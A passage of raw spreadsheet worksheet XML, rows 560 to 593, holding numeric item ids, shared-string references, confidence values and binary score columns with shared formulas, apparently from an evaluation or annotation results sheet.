      </c>
      <c r="E560" s="62" t="s">
        <v>1871</v>
      </c>
      <c r="F560" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G560" s="62">
        <v>0.9</v>
      </c>
      <c r="H560" s="64">
        <v>1.0</v>
      </c>
      <c r="I560" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J560" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K560" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L560" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O560" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="62">
        <v>9508.0</v>
      </c>
      <c r="B561" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C561" s="63" t="s">
        <v>1872</v>
      </c>
      <c r="D561" s="62" t="s">
        <v>1873</v>
      </c>
      <c r="E561" s="62" t="s">
        <v>1874</v>
      </c>
      <c r="F561" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G561" s="62">
        <v>0.85</v>
      </c>
      <c r="H561" s="64">
        <v>1.0</v>
      </c>
      <c r="I561" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J561" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K561" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L561" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O561" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="62">
        <v>10190.0</v>
      </c>
      <c r="B562" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C562" s="63" t="s">
        <v>1875</v>
      </c>
      <c r="D562" s="62" t="s">
        <v>1876</v>
      </c>
      <c r="E562" s="62" t="s">
        <v>1877</v>
      </c>
      <c r="F562" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G562" s="62">
        <v>0.9</v>
      </c>
      <c r="H562" s="64">
        <v>1.0</v>
      </c>
      <c r="I562" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J562" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K562" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L562" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O562" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="62">
        <v>11953.0</v>
      </c>
      <c r="B563" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C563" s="63" t="s">
        <v>1878</v>
      </c>
      <c r="D563" s="62" t="s">
        <v>1879</v>
      </c>
      <c r="E563" s="62" t="s">
        <v>1880</v>
      </c>
      <c r="F563" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G563" s="62">
        <v>0.9</v>
      </c>
      <c r="H563" s="64">
        <v>1.0</v>
      </c>
      <c r="I563" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J563" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K563" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L563" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O563" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="62">
        <v>13671.0</v>
      </c>
      <c r="B564" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C564" s="63" t="s">
        <v>1881</v>
      </c>
      <c r="D564" s="62" t="s">
        <v>1882</v>
      </c>
      <c r="E564" s="62" t="s">
        <v>1883</v>
      </c>
      <c r="F564" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G564" s="62">
        <v>0.95</v>
      </c>
      <c r="H564" s="64">
        <v>1.0</v>
      </c>
      <c r="I564" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J564" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K564" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L564" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O564" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="62">
        <v>15381.0</v>
      </c>
      <c r="B565" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C565" s="63" t="s">
        <v>1884</v>
      </c>
      <c r="D565" s="62" t="s">
        <v>1885</v>
      </c>
      <c r="E565" s="62" t="s">
        <v>1886</v>
      </c>
      <c r="F565" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G565" s="62">
        <v>0.95</v>
      </c>
      <c r="H565" s="64">
        <v>1.0</v>
      </c>
      <c r="I565" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J565" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K565" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L565" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O565" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="62">
        <v>16059.0</v>
      </c>
      <c r="B566" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C566" s="63" t="s">
        <v>1887</v>
      </c>
      <c r="D566" s="62" t="s">
        <v>1888</v>
      </c>
      <c r="E566" s="62" t="s">
        <v>1889</v>
      </c>
      <c r="F566" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G566" s="62">
        <v>0.9</v>
      </c>
      <c r="H566" s="64">
        <v>0.0</v>
      </c>
      <c r="I566" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J566" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K566" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L566" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O566" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="62">
        <v>16434.0</v>
      </c>
      <c r="B567" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C567" s="63" t="s">
        <v>1890</v>
      </c>
      <c r="D567" s="62" t="s">
        <v>1891</v>
      </c>
      <c r="E567" s="62" t="s">
        <v>1892</v>
      </c>
      <c r="F567" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G567" s="62">
        <v>0.95</v>
      </c>
      <c r="H567" s="64">
        <v>0.0</v>
      </c>
      <c r="I567" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J567" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K567" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L567" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O567" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="62">
        <v>16542.0</v>
      </c>
      <c r="B568" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C568" s="63" t="s">
        <v>1893</v>
      </c>
      <c r="D568" s="62" t="s">
        <v>1894</v>
      </c>
      <c r="E568" s="62" t="s">
        <v>1895</v>
      </c>
      <c r="F568" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G568" s="62">
        <v>0.85</v>
      </c>
      <c r="H568" s="64">
        <v>0.0</v>
      </c>
      <c r="I568" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J568" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K568" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L568" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O568" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="62">
        <v>16888.0</v>
      </c>
      <c r="B569" s="62" t="s">
        <v>74</v>
      </c>
      <c r="C569" s="63" t="s">
        <v>1896</v>
      </c>
      <c r="D569" s="62" t="s">
        <v>1897</v>
      </c>
      <c r="E569" s="62" t="s">
        <v>1898</v>
      </c>
      <c r="F569" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G569" s="62">
        <v>0.9</v>
      </c>
      <c r="H569" s="64">
        <v>0.0</v>
      </c>
      <c r="I569" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J569" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K569" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L569" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O569" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="62">
        <v>999.0</v>
      </c>
      <c r="B570" s="62" t="s">
        <v>76</v>
      </c>
      <c r="C570" s="63" t="s">
        <v>1899</v>
      </c>
      <c r="D570" s="62" t="s">
        <v>1900</v>
      </c>
      <c r="E570" s="62" t="s">
        <v>1901</v>
      </c>
      <c r="F570" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G570" s="62">
        <v>0.85</v>
      </c>
      <c r="H570" s="64">
        <v>1.0</v>
      </c>
      <c r="I570" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J570" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K570" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L570" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O570" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="62">
        <v>1499.0</v>
      </c>
      <c r="B571" s="62" t="s">
        <v>76</v>
      </c>
      <c r="C571" s="63" t="s">
        <v>1902</v>
      </c>
      <c r="D571" s="62" t="s">
        <v>1903</v>
      </c>
      <c r="E571" s="62" t="s">
        <v>1904</v>
      </c>
      <c r="F571" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G571" s="62">
        <v>0.85</v>
      </c>
      <c r="H571" s="64">
        <v>1.0</v>
      </c>
      <c r="I571" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J571" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K571" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L571" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O571" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="62">
        <v>1964.0</v>
      </c>
      <c r="B572" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C572" s="63" t="s">
        <v>1905</v>
      </c>
      <c r="D572" s="62" t="s">
        <v>1906</v>
      </c>
      <c r="E572" s="62" t="s">
        <v>1907</v>
      </c>
      <c r="F572" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G572" s="62">
        <v>0.9</v>
      </c>
      <c r="H572" s="64">
        <v>1.0</v>
      </c>
      <c r="I572" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J572" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K572" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L572" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O572" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="62">
        <v>1998.0</v>
      </c>
      <c r="B573" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C573" s="63" t="s">
        <v>1908</v>
      </c>
      <c r="D573" s="62" t="s">
        <v>1909</v>
      </c>
      <c r="E573" s="62" t="s">
        <v>1910</v>
      </c>
      <c r="F573" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G573" s="62">
        <v>0.85</v>
      </c>
      <c r="H573" s="64">
        <v>1.0</v>
      </c>
      <c r="I573" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J573" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K573" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L573" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O573" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="62">
        <v>2139.0</v>
      </c>
      <c r="B574" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C574" s="63" t="s">
        <v>1911</v>
      </c>
      <c r="D574" s="62" t="s">
        <v>1912</v>
      </c>
      <c r="E574" s="62" t="s">
        <v>1913</v>
      </c>
      <c r="F574" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G574" s="62">
        <v>0.9</v>
      </c>
      <c r="H574" s="64">
        <v>0.0</v>
      </c>
      <c r="I574" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J574" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K574" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L574" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O574" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="62">
        <v>2152.0</v>
      </c>
      <c r="B575" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C575" s="63" t="s">
        <v>1914</v>
      </c>
      <c r="D575" s="62" t="s">
        <v>1915</v>
      </c>
      <c r="E575" s="62" t="s">
        <v>1916</v>
      </c>
      <c r="F575" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G575" s="62">
        <v>0.8</v>
      </c>
      <c r="H575" s="64">
        <v>1.0</v>
      </c>
      <c r="I575" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J575" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K575" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L575" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M575" s="62" t="s">
        <v>1917</v>
      </c>
      <c r="N575" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O575" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="62">
        <v>2322.0</v>
      </c>
      <c r="B576" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C576" s="63" t="s">
        <v>1918</v>
      </c>
      <c r="D576" s="62" t="s">
        <v>1919</v>
      </c>
      <c r="E576" s="62" t="s">
        <v>1920</v>
      </c>
      <c r="F576" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G576" s="62">
        <v>0.9</v>
      </c>
      <c r="H576" s="64">
        <v>1.0</v>
      </c>
      <c r="I576" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J576" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K576" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L576" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O576" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="62">
        <v>2329.0</v>
      </c>
      <c r="B577" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C577" s="63" t="s">
        <v>1921</v>
      </c>
      <c r="D577" s="62" t="s">
        <v>1922</v>
      </c>
      <c r="E577" s="62" t="s">
        <v>1923</v>
      </c>
      <c r="F577" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G577" s="62">
        <v>0.9</v>
      </c>
      <c r="H577" s="64">
        <v>1.0</v>
      </c>
      <c r="I577" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J577" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K577" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L577" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O577" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="62">
        <v>2529.0</v>
      </c>
      <c r="B578" s="62" t="s">
        <v>78</v>
      </c>
      <c r="C578" s="63" t="s">
        <v>1924</v>
      </c>
      <c r="D578" s="62" t="s">
        <v>1925</v>
      </c>
      <c r="E578" s="62" t="s">
        <v>1926</v>
      </c>
      <c r="F578" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G578" s="62">
        <v>0.95</v>
      </c>
      <c r="H578" s="64">
        <v>1.0</v>
      </c>
      <c r="I578" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J578" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K578" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L578" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O578" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="62">
        <v>13824.0</v>
      </c>
      <c r="B579" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C579" s="63" t="s">
        <v>1927</v>
      </c>
      <c r="D579" s="62" t="s">
        <v>1928</v>
      </c>
      <c r="E579" s="62" t="s">
        <v>1929</v>
      </c>
      <c r="F579" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G579" s="62">
        <v>0.9</v>
      </c>
      <c r="H579" s="64">
        <v>1.0</v>
      </c>
      <c r="I579" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J579" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K579" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L579" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O579" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="62">
        <v>13831.0</v>
      </c>
      <c r="B580" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C580" s="63" t="s">
        <v>1930</v>
      </c>
      <c r="D580" s="62" t="s">
        <v>1931</v>
      </c>
      <c r="E580" s="62" t="s">
        <v>1932</v>
      </c>
      <c r="F580" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G580" s="62">
        <v>0.9</v>
      </c>
      <c r="H580" s="64">
        <v>1.0</v>
      </c>
      <c r="I580" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J580" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K580" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L580" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O580" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="62">
        <v>13986.0</v>
      </c>
      <c r="B581" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C581" s="63" t="s">
        <v>1933</v>
      </c>
      <c r="D581" s="62" t="s">
        <v>1934</v>
      </c>
      <c r="E581" s="62" t="s">
        <v>1935</v>
      </c>
      <c r="F581" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G581" s="62">
        <v>0.95</v>
      </c>
      <c r="H581" s="64">
        <v>1.0</v>
      </c>
      <c r="I581" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J581" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K581" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L581" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O581" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="62">
        <v>14208.0</v>
      </c>
      <c r="B582" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C582" s="63" t="s">
        <v>1936</v>
      </c>
      <c r="D582" s="62" t="s">
        <v>1937</v>
      </c>
      <c r="E582" s="62" t="s">
        <v>1938</v>
      </c>
      <c r="F582" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G582" s="62">
        <v>0.95</v>
      </c>
      <c r="H582" s="64">
        <v>1.0</v>
      </c>
      <c r="I582" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J582" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K582" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L582" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O582" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="62">
        <v>14291.0</v>
      </c>
      <c r="B583" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C583" s="63" t="s">
        <v>1939</v>
      </c>
      <c r="D583" s="62" t="s">
        <v>1940</v>
      </c>
      <c r="E583" s="62" t="s">
        <v>1941</v>
      </c>
      <c r="F583" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G583" s="62">
        <v>0.95</v>
      </c>
      <c r="H583" s="64">
        <v>1.0</v>
      </c>
      <c r="I583" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J583" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K583" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L583" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O583" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="62">
        <v>14458.0</v>
      </c>
      <c r="B584" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C584" s="63" t="s">
        <v>1942</v>
      </c>
      <c r="D584" s="62" t="s">
        <v>1943</v>
      </c>
      <c r="E584" s="62" t="s">
        <v>1944</v>
      </c>
      <c r="F584" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G584" s="62">
        <v>0.95</v>
      </c>
      <c r="H584" s="64">
        <v>0.0</v>
      </c>
      <c r="I584" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J584" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K584" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L584" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O584" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="62">
        <v>14498.0</v>
      </c>
      <c r="B585" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C585" s="63" t="s">
        <v>1945</v>
      </c>
      <c r="D585" s="62" t="s">
        <v>1946</v>
      </c>
      <c r="E585" s="62" t="s">
        <v>1947</v>
      </c>
      <c r="F585" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G585" s="62">
        <v>0.95</v>
      </c>
      <c r="H585" s="64">
        <v>1.0</v>
      </c>
      <c r="I585" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J585" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K585" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L585" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O585" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="62">
        <v>14647.0</v>
      </c>
      <c r="B586" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C586" s="63" t="s">
        <v>1948</v>
      </c>
      <c r="D586" s="62" t="s">
        <v>1949</v>
      </c>
      <c r="E586" s="62" t="s">
        <v>1950</v>
      </c>
      <c r="F586" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G586" s="62">
        <v>0.95</v>
      </c>
      <c r="H586" s="64">
        <v>1.0</v>
      </c>
      <c r="I586" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J586" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K586" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L586" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O586" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="62">
        <v>14674.0</v>
      </c>
      <c r="B587" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C587" s="63" t="s">
        <v>1951</v>
      </c>
      <c r="D587" s="62" t="s">
        <v>1952</v>
      </c>
      <c r="E587" s="62" t="s">
        <v>1953</v>
      </c>
      <c r="F587" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G587" s="62">
        <v>0.95</v>
      </c>
      <c r="H587" s="64">
        <v>1.0</v>
      </c>
      <c r="I587" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J587" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K587" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L587" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O587" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="62">
        <v>14676.0</v>
      </c>
      <c r="B588" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C588" s="63" t="s">
        <v>1954</v>
      </c>
      <c r="D588" s="62" t="s">
        <v>1955</v>
      </c>
      <c r="E588" s="62" t="s">
        <v>1956</v>
      </c>
      <c r="F588" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G588" s="62">
        <v>0.95</v>
      </c>
      <c r="H588" s="64">
        <v>1.0</v>
      </c>
      <c r="I588" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J588" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K588" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L588" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O588" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="62">
        <v>14769.0</v>
      </c>
      <c r="B589" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C589" s="63" t="s">
        <v>1957</v>
      </c>
      <c r="D589" s="62" t="s">
        <v>1958</v>
      </c>
      <c r="E589" s="62" t="s">
        <v>1959</v>
      </c>
      <c r="F589" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G589" s="62">
        <v>0.9</v>
      </c>
      <c r="H589" s="64">
        <v>0.0</v>
      </c>
      <c r="I589" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J589" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K589" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L589" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O589" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="62">
        <v>14863.0</v>
      </c>
      <c r="B590" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C590" s="63" t="s">
        <v>1960</v>
      </c>
      <c r="D590" s="62" t="s">
        <v>1961</v>
      </c>
      <c r="E590" s="62" t="s">
        <v>1962</v>
      </c>
      <c r="F590" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G590" s="62">
        <v>0.85</v>
      </c>
      <c r="H590" s="64">
        <v>0.0</v>
      </c>
      <c r="I590" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J590" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K590" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L590" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O590" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="62">
        <v>15430.0</v>
      </c>
      <c r="B591" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C591" s="63" t="s">
        <v>1963</v>
      </c>
      <c r="D591" s="62" t="s">
        <v>1964</v>
      </c>
      <c r="E591" s="62" t="s">
        <v>1965</v>
      </c>
      <c r="F591" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G591" s="62">
        <v>0.9</v>
      </c>
      <c r="H591" s="64">
        <v>1.0</v>
      </c>
      <c r="I591" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J591" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K591" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L591" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O591" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="62">
        <v>15476.0</v>
      </c>
      <c r="B592" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C592" s="63" t="s">
        <v>1966</v>
      </c>
      <c r="D592" s="62" t="s">
        <v>1967</v>
      </c>
      <c r="E592" s="62" t="s">
        <v>1968</v>
      </c>
      <c r="F592" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G592" s="62">
        <v>0.95</v>
      </c>
      <c r="H592" s="64">
        <v>1.0</v>
      </c>
      <c r="I592" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J592" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K592" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L592" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O592" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="62">
        <v>15485.0</v>
      </c>
      <c r="B593" s="62" t="s">
        <v>80</v>
      </c>
      <c r="C593" s="63" t="s">
        <v>1969</v>
      </c>
      <c r="D593" s="62" t="s">
        <v>1970</v>
      </c>
      <c r="E593" s="62" t="s">
        <v>1971</v>
      </c>
      <c r="F593" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G593" s="62">
        <v>0.95</v>
      </c>
      <c r="H593" s="64">
        <v>1.0</v>
      </c>
      <c r="I593" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J593" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K593" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
